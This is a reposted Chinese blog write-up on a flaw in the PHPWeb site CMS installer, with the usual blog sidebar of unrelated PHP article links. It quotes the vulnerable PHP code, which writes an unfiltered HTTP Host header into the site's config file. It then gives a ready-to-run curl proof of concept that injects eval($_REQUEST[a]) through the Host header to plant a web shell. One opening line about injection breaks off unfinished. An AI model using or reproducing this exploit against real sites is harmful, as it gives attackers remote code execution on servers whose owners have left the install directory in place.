phpweb成品网站最新版(注入、上传、写shell)
发布日期:2025-05-03 09:27:41
浏览次数:11
分类:精选文章
本文共 1095 字,大约阅读时间需要 3 分钟。
注入:通过
之所以鸡肋就是该漏洞利用安装文件重新生成配置文件并写入可执行代码。鸡肋1:具有破坏性,动作非常大,重新写了配置文件、数据库连接文件。
鸡肋2:有一定安全常识的站长都会删掉install目录。
虽然鸡肋,但也有优点:不受magic_quotes_gpc、webserver影响。
$siteurl = "http://" . $_SERVER["HTTP_HOST"] . "/"; //未过滤$filestr = fread(fopen($SysConfigFile, 'r'), 30000);$filestr = str_replace(" ", "", $filestr);$filestr = str_replace("DefaultDbHost", $dbhost, $filestr);$filestr = str_replace("DefaultDbName", $dbname, $filestr);$filestr = str_replace("DefaultDbUser", $dbuser, $filestr);$filestr = str_replace("DefaultDbPass", $dbpwd, $filestr);$filestr = str_replace("DefaultsLan", "zh_cn", $filestr);$filestr = str_replace("DefaultTablePre", $tablepre, $filestr);$filestr = str_replace("DefaultSiteUrl", $siteurl, $filestr);fwrite(fopen($ConFile, "w"), $filestr, 30000); $_SERVER["HTTP_HOST"]即http头中HOST传递过来的可控且不受magic_quotes_gpc影响。
poc
curl http://fuck.0day5.com/base/install/index.php --data "dbhost=localhost&dbname=phpweb&dbuser=root&dbpwd=root&tablepre=pwn&nextstep=3&command=gonext&alertmsg=&username=" --header "HOST:localhost\";eval($_REQUEST[a]);#"
转载自:https://www.cnblogs.com/58top/p/3728626.html
发表评论
最新留言
留言是一种美德,欢迎回访!
[***.207.175.100]2026年06月10日 01时35分55秒
关于作者
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!
-- 愿君每日到此一游!
推荐文章
php判断ip黑名单程序代码
2023-03-01
php判断复选框是否被选中的方法
2023-03-01
PHP判断指定目录下是否存在文件
2023-03-01
php判断数组是否为空
2023-03-01
PHP判断数组是否有重复值、获取重复值
2023-03-01
PHP利用正则表达式实现手机号码中间4位用星号(*)替换显示
2023-03-01
PHP加密与安全的最佳实践
2023-03-01
PHP区分 企业微信浏览器 | 普通微信浏览器 | 其他浏览器
2023-03-01
php原生代码怎么连表查询,PHP tp5中使用原生sql查询代码实例
2023-03-01
PHP去掉转义符
2023-03-01
php反射api
2023-03-01
PHP反射ReflectionClass、ReflectionMethod 入门教程
2023-03-01
PHP反射机制
2023-03-01
php取当天的最后一秒_Docker快速搭建PHP开发环境详细教程
2023-03-01
php取绝对值
2023-03-01
php各种常用的算法
2023-03-01
php各种缓存策略对比
2023-03-01
RabbitMQ高级特性 - 消息分发(限流、负载均衡)
2023-03-01
php后台“爬虫”模拟登录第三方系统
2023-03-01
php后台的在控制器中就可以实现阅读数增加
2023-03-01
白红宇的个人博客 - 记录点点滴滴的事 - 您是第 475212405 位访客